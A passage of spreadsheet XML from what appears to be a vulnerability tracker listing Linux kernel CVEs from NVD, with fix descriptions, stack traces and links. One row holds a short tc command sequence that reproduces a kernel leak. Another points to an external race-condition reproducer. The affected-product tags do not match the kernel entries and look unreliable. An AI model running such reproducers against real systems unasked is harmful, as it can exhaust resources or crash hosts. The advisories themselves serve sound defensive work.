[&lt;0&gt;] 0xc00000011c78f870
[&lt;0&gt;] __switch_to+0xfc/0x1a0
[&lt;0&gt;] pci_lock_rescan_remove+0x30/0x44
[&lt;0&gt;] eeh_rmv_device+0x290/0x2e0
[&lt;0&gt;] eeh_pe_dev_traverse+0x80/0x130
[&lt;0&gt;] eeh_reset_device+0xcc/0x23c
[&lt;0&gt;] eeh_handle_normal_event+0x830/0xa80
[&lt;0&gt;] eeh_event_handler+0xf8/0x190
[&lt;0&gt;] kthread+0x194/0x1b0
[&lt;0&gt;] start_kernel_thread+0x14/0x18
The issue is seen for cases where the errors are detected on the PHB
directly AND|OR for devices where the driver error_detected() returns
PCI_ERS_RESULT_NEED_RESET, and driver being not EEH sensitive(i.e no
error handlers like slot_reset(), resume() etc defined).</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97948</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97952</t>
        </is>
      </c>
      <c r="D310" s="5" t="inlineStr"/>
      <c r="E310" s="5" t="inlineStr"/>
      <c r="F310" s="5" t="inlineStr"/>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr"/>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunvdc: unmap LDC cookies when the descriptor send fails
__send_request() maps the request's pages into the LDC channel's map
table (ldc_map_sg()), fills in the descriptor and marks it
VIO_DESC_READY before ringing the doorbell via __vdc_tx_trigger().
When the trigger fails, the error path only prints a message: the
descriptor stays READY and the cookies are never unmapped. The
mapping is normally released in vdc_end_one() when the peer completes
the descriptor - but a descriptor whose doorbell was never sent will
never complete, and since dr-&gt;prod is not advanced on failure, the
reset path (vdc_requeue_inflight(), which walks [cons, prod)) never
visits it either. The map table entries are leaked permanently.
Since commit a11f6ca9aef9 ("sunvdc: Do not spin in an infinite loop
when vio_ldc_send() returns EAGAIN") trigger failures occur in
practice under load, so every resulting I/O error also leaks one
request's worth of entries from the fixed-size (8192 entries per
channel) map table. Because the allocator hands out contiguous
ranges, fragmentation makes large multi-segment requests fail first
as the table drains, until ldc_map_sg() fails permanently and the
disk is dead until reboot.
It also makes any retry-based recovery unusable: requeuing the
request on -EAGAIN remaps the pages on every attempt, overwriting
desc-&gt;cookies and orphaning the previous mapping, so the table
drains at the retry rate. This is the memory exhaustion observed
when the requeue approach was first tested in October 2025.
Roll back on failure: unmap the cookies, mark the descriptor FREE
again and clear the request entry. If the trigger failed with
-ENOTCONN, __vdc_tx_trigger() has already reset the port, which
tears down and reallocates both the dring and the LDC channel
including its map table - nothing to roll back, and the stale
descriptor must not be touched.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97952</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97958</t>
        </is>
      </c>
      <c r="D311" s="5" t="inlineStr"/>
      <c r="E311" s="5" t="inlineStr"/>
      <c r="F311" s="5" t="inlineStr"/>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>f5, requests</t>
        </is>
      </c>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr"/>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_api: Don't replay RTM_GETCHAIN in tc_ctl_chain().
If a netlink socket sends RTM_GETCHAIN requests repeatedly
without recv()ing the responses, tc_ctl_chain() hogs CPU and
triggers Hung Task splat. [0]
As caught in the stack trace, netlink_attachskb() could confuse
tc_ctl_chain() by returning -EAGAIN when the userspace netlink
socket's receive buffer is full.
The replay: label exists since commit 32a4f5ecd738 ("net: sched:
introduce chain object to uapi") but was not used initially.
Since commit 9f407f1768d3 ("net: sched: introduce chain templates"),
the label is needed for RTM_NEWCHAIN because tcf_proto_lookup_ops()
may release RTNL to call request_module().
However, the replay logic is unnecessary for RTM_GETCHAIN.
Let's apply the replay logic only for RTM_NEWCHAIN.
[0]:
INFO: task repro:1018 is blocked on a mutex likely owned by task repro:1022.
task:repro           state:R  running task     stack:14096 pid:1022  tgid:1014  ppid:961    task_flags:0x400040 flags:0x00080000
Call Trace:
 &lt;TASK&gt;
 ? clockevents_program_event (kernel/time/clockevents.c:372)
 ? pskb_expand_head (net/core/skbuff.c:615)
 ? skb_release_data (net/core/skbuff.c:1122)
 ? netlink_attachskb (./include/linux/skbuff.h:1323 ./include/linux/skbuff.h:1332 net/netlink/af_netlink.c:1232)
 ? __netlink_lookup (./include/linux/rcupdate.h:882 ./include/linux/rhashtable.h:711 net/netlink/af_netlink.c:499)
 ? tc_chain_notify (net/sched/cls_api.c:3045)
 ? tc_chain_notify (./include/linux/skbuff.h:1384 net/sched/cls_api.c:3041)
 ? netlink_unicast (net/netlink/af_netlink.c:1335)
 ? rtnl_unicast (./include/net/netlink.h:1198 net/core/rtnetlink.c:985)
 ? tc_ctl_chain (net/sched/cls_api.c:3242)
 ? rtnetlink_rcv_msg (net/core/rtnetlink.c:7146)
 ? netlink_unicast (net/netlink/af_netlink.c:1354)
 ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:7177)
 ? netlink_rcv_skb (net/netlink/af_netlink.c:2556)
 ? netlink_unicast (net/netlink/af_netlink.c:1319)
 ? netlink_sendmsg (net/netlink/af_netlink.c:1900)
 ? __sock_sendmsg (net/socket.c:800)
 ? __sys_sendto (net/socket.c:2281)
 ? __x64_sys_sendto (net/socket.c:2288 net/socket.c:2284 net/socket.c:2284)
 ? do_syscall_64 (arch/x86/entry/syscall_64.c:61 arch/x86/entry/syscall_64.c:84)
 ? entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97958</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97959</t>
        </is>
      </c>
      <c r="D312" s="5" t="inlineStr"/>
      <c r="E312" s="5" t="inlineStr"/>
      <c r="F312" s="5" t="inlineStr"/>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr"/>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_route: free emptied bucket on filter move
route4_change can move an existing filter to a different top-level
bucket: route4_set_parms recomputes the handle from TCA_ROUTE4_TO/
FROM/IIF, and the handle-mismatch check is gated on the 'new' flag, so
for an existing filter the new handle may differ from the old one and
land in a different bucket. When this happens, the filter is unlinked
from the old bucket, but the bucket itself is never freed once it goes
empty. The stale empty bucket remains in head-&gt;table[], causing
route4_delete to report *last=false even after the last live filter is
gone. That pins the empty tcf_proto and causes a leak.
Fix this by refcounting the filters linked to a bucket and freeing the
bucket when the count drops to zero. The existing scan in route4_delete
goes away with it.
The count is updated at all sites that link or unlink a filter during add,
change and delete, and the bucket is dropped from head-&gt;table[] as soon as
it reaches zero.
Conditions to recreate the bug:
  CONFIG_NET_CLS_ROUTE4=y, CONFIG_NET_SCH_INGRESS=y, CONFIG_NET_CLS_ACT=y.
  tc qdisc replace dev lo clsact
  tc filter add dev lo ingress protocol ip pref 100 route from 1 to 1
  tc filter change dev lo ingress protocol ip pref 100 handle 0x10001 \
    route from 1 to 2
  tc filter del dev lo ingress protocol ip pref 100 handle 0x10002 \
    route from 1 to 2
  tc filter show dev lo ingress | grep -c 'pref 100 route chain 0 '</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97959</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97964</t>
        </is>
      </c>
      <c r="D313" s="5" t="inlineStr"/>
      <c r="E313" s="5" t="inlineStr"/>
      <c r="F313" s="5" t="inlineStr"/>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr"/>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_synctty: ensure a writeable skb header
ppp_sync_txmunge() checks headroom before prepending the address and
control bytes, but does not ensure that the skb header is writable.
A received skb can reach this function through PPP channel bridging
without passing through ppp_start_xmit(), which calls skb_cow_head().
For example, a PPPoE frame may share its buffer with a clone queued to
an AF_PACKET socket. If it is bridged to a synchronous tty channel, the
address/control bytes can overwrite data still visible to that socket.
Use skb_cow_head() to ensure both sufficient headroom and a writable
header.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97964</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97965</t>
        </is>
      </c>
      <c r="D314" s="5" t="inlineStr"/>
      <c r="E314" s="5" t="inlineStr"/>
      <c r="F314" s="5" t="inlineStr"/>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr"/>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: initialize _md in vxlan_xmit_one()
If a VXLAN device is configured with both VXLAN_F_COLLECT_METADATA and
VXLAN_F_GBP, and a packet is transmitted through it using an external
ip_tunnel_info that lacks the IP_TUNNEL_VXLAN_OPT_BIT flag, md is left
pointing to the uninitialized _md stack variable:
                if (test_bit(IP_TUNNEL_VXLAN_OPT_BIT, info-&gt;key.tun_flags)) {
                        if (info-&gt;options_len &lt; sizeof(*md))
                                goto drop;
                        md = ip_tunnel_info_opts(info);
                }
Because IP_TUNNEL_VXLAN_OPT_BIT is not set, md is not updated and remains
pointing to _md. Later, vxlan_build_skb() is called with md, which
eventually calls vxlan_build_gbp_hdr():
        if (vxflags &amp; VXLAN_F_GBP)
                vxlan_build_gbp_hdr(vxh, md);
Inside vxlan_build_gbp_hdr(), md-&gt;gbp is read:
        if (!md-&gt;gbp)
                return;
        gbp = (struct vxlanhdr_gbp *)vxh;
        ...
        if (md-&gt;gbp &amp; VXLAN_GBP_DONT_LEARN)
                gbp-&gt;dont_learn = 1;
If the stack contains garbage, this causes:
1) VXLAN_HF_GBP flag to be spuriously set in the VXLAN header.
2) gbp-&gt;dont_learn and gbp-&gt;policy_applied to be set from stack bits.
3) gbp-&gt;policy_id to receive 16 bits of uninitialized kernel stack data,
   leaking it onto the wire.
Fix this by zero-initializing _md. If IP_TUNNEL_VXLAN_OPT_BIT is not
present, md-&gt;gbp remains 0, and vxlan_build_gbp_hdr() returns early
without modifying the VXLAN header.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97965</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97974</t>
        </is>
      </c>
      <c r="D315" s="5" t="inlineStr"/>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="inlineStr"/>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>github, f5</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr"/>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: null-check fib6_node before accessing in __ip6_del_rt_siblings()
syzbot reported a null-ptr-deref in __ip6_del_rt_siblings() [0].
The stack trace hinted towards a null dereference of rt-&gt;fib6_node when
fn-&gt;leaf is accessed in __ip6_del_rt_siblings(). With
RTNL_FLAG_DOIT_UNLOCKED set, inet6_rtm_delroute() operations run
concurrently without acquiring the RTNL lock. In ip6_route_del(), the
route lookup happens under rcu_read_lock() without acquiring
table-&gt;tb6_lock.
Between ip6_route_del() looking up the route and __ip6_del_rt_siblings()
acquiring table-&gt;tb6_lock, another thread can modify the routing table.
For example, when an ECMP route is replaced via RTM_NEWROUTE with
NLM_F_REPLACE, fib6_add_rt2node() unlinks all old siblings and sets
iter-&gt;fib6_node = NULL. A reproducer was found that triggers this [1].
Add a check to ensure rt-&gt;fib6_node is non-null before accessing it.
[0]
KASAN: null-ptr-deref in range [0x0000000000000020-0x0000000000000027]
RIP: 0010:__ip6_del_rt_siblings+0x31e/0x7c0 net/ipv6/route.c:4056
Call Trace:
 &lt;TASK&gt;
 ip6_route_del+0x1054/0x1110 net/ipv6/route.c:4232
 inet6_rtm_delroute+0x5d7/0x6d0 net/ipv6/route.c:5669
 rtnetlink_rcv_msg+0x802/0xc00 net/core/rtnetlink.c:7132
 netlink_rcv_skb+0x226/0x4a0 net/netlink/af_netlink.c:2556
 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
 netlink_unicast+0x7f5/0x990 net/netlink/af_netlink.c:1345
 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1900
 sock_sendmsg_nosec+0x13a/0x180 net/socket.c:800
 __sock_sendmsg net/socket.c:815 [inline]
 ____sys_sendmsg+0x565/0x870 net/socket.c:2713
 ___sys_sendmsg+0x2a5/0x360 net/socket.c:2767
 __sys_sendmsg net/socket.c:2799 [inline]
 __do_sys_sendmsg net/socket.c:2804 [inline]
 __se_sys_sendmsg net/socket.c:2802 [inline]
 __x64_sys_sendmsg+0x1b7/0x290 net/socket.c:2802
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 &lt;/TASK&gt;
[1] https://gist.github.com/NamanGulati/0766a1159b6ca61928faaf87425ff899</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97974</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97975</t>
        </is>
      </c>
      <c r="D316" s="5" t="inlineStr"/>
      <c r="E316" s="5" t="inlineStr"/>
      <c r="F316" s="5" t="inlineStr"/>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr"/>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_sysfs: Fix NULL pointer dereference in device_del()
A NULL pointer dereference in klist_put() occurs when a child device (such
as a BNEP network device in bnep_session) is concurrently being
unregistered while hci_conn_del_sysfs() reparents child devices.
This is caused by a race condition between hci_conn_del_sysfs() and
concurrent child device unregistration (e.g. bnep_session calling
unregister_netdev()). During device unregistration, device_del() snapshots
a non-NULL parent pointer. Concurrently, hci_conn_del_sysfs() finds the
child device using device_find_any_child() and calls device_move() to
reparent it to NULL, which removes the node from its parent's klist and
clears knode_parent. Subsequently, device_del() calls
klist_del(&amp;dev-&gt;p-&gt;knode_parent) using the stale parent snapshot, causing
klist_put() to dereference knode_klist(n)-&gt;put on an already removed node,
resulting in a NULL pointer dereference.
This race was introduced by commit 27aabf27fd01 ("Bluetooth: fix
use-after-free in device_for_each_child()"), which replaced
device_find_child(..., __match_tty) with device_find_any_child() in
hci_conn_del_sysfs(). That change was intended to avoid a use-after-free
where conn-&gt;dev outlived its parent hdev-&gt;dev when child devices held
references to conn-&gt;dev, because conn-&gt;dev only held a reference to
hdev-&gt;dev while registered in sysfs.
Fix the issue properly by taking an explicit reference to the parent device
with get_device(&amp;hdev-&gt;dev) in hci_conn_init_sysfs() and dropping it with
put_device(parent) in bt_link_release() when the conn device is freed. This
ensures that hdev-&gt;dev remains valid for the entire lifecycle of conn-&gt;dev,
resolving the underlying use-after-free. With the parent reference held
properly, restore the __match_tty filter in hci_conn_del_sysfs() so that
device_move() is only invoked on persistent RFCOMM TTY devices as
originally intended, eliminating the race condition with unregistering
network devices.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97975</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97976</t>
        </is>
      </c>
      <c r="D317" s="5" t="inlineStr"/>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="inlineStr"/>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr"/>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel_pcie: validate packet_len before skb_put_data
btintel_pcie_submit_rx_work() reads packet_len from rfh_hdr without
checking if it exceeds the RX buffer size. An oversized packet_len
can lead to an out-of-bounds read in skb_put_data().
Validate packet_len to ensure it is non-zero and does not exceed
BTINTEL_PCIE_BUFFER_SIZE - sizeof(*rfh_hdr), logging an error when
invalid.
This issue was reported by Claude Mythos. It can be simulated either by
using customized firmware configured to return an invalid packet_len or
by modifying rfh_hdr-&gt;packet_len in the driver before calling
btintel_pcie_submit_rx_work().</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97976</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97978</t>
        </is>
      </c>
      <c r="D318" s="5" t="inlineStr"/>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="inlineStr"/>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr"/>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: ice: don't dereference pointers from TP_printk()
After forwarding net-next during the v7.3 merge window we started
seeing:
  TRACE EVENT ERROR: Event ice_tx_dim_work has double dereference in TP_printk: REC-&gt;q_vector-&gt;tx.tx_ring-&gt;q_index
  WARNING: kernel/trace/trace_events.c:420 at test_double_dereference.cold+0x39/0x4b
this is due to extra checks added in tracing subsystem in
commit b5cc230af5e5 ("tracing: Warn when an event dereferences a pointer in TP_printk()").
Printing happens long after the event was recorded, by which point
the pointers may be invalid (the ring or the dim instance).
Copy the eight scalars into the event instead.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97978</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97979</t>
        </is>
      </c>
      <c r="D319" s="5" t="inlineStr"/>
      <c r="E319" s="5" t="inlineStr"/>
      <c r="F319" s="5" t="inlineStr"/>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr"/>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: add missing xa_destroy for sched_node_ids
Commit 16dfa49406bc ("ice: Introduce new parameters in ice_sched_node")
added a sched_node_ids xarray to the port info structure, but never called
xa_destroy on it.
Since xarrays can allocate internal memory, this can result in a memory
leak even if every element in the xarray has been removed.
The xarray is currently embedded in the port_info structure. This appears
to have been done because its use is within functions that take the
port_info as a primary argument.
However, this complicates managing the lifecycle of the field. The
port_info structure is allocated in ice_init_hw() using devm, and it is
not released until the devm cleanup when the driver is unloaded.
The ice_init_hw() function is called in many places, including devlink
reload, and possibly during DDP load after updating the Tx scheduler
layout.
Adding a call of xa_destroy to the ice_deinit_hw() causes Sashiko to raise
multiple concerns due to potential ordering issues and possible ways that
port_info could be a dangling reference.
To handle this, move the sched_node_ids out of port_info and into the hw
structure. All users of the array already have a pointer to hw anyways, and
there is only one sched_node_ids per adapter. While here, remove the overly
verbose comment explaining the nature of the sched_node_ids xarray.
Add the missing xa_destroy to the cleanup path and to ice_deinit_hw(),
ensuring that we properly release the xarray memory.
This was caught by Sashiko during development of unrelated code.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97979</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97984</t>
        </is>
      </c>
      <c r="D320" s="5" t="inlineStr"/>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="inlineStr"/>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
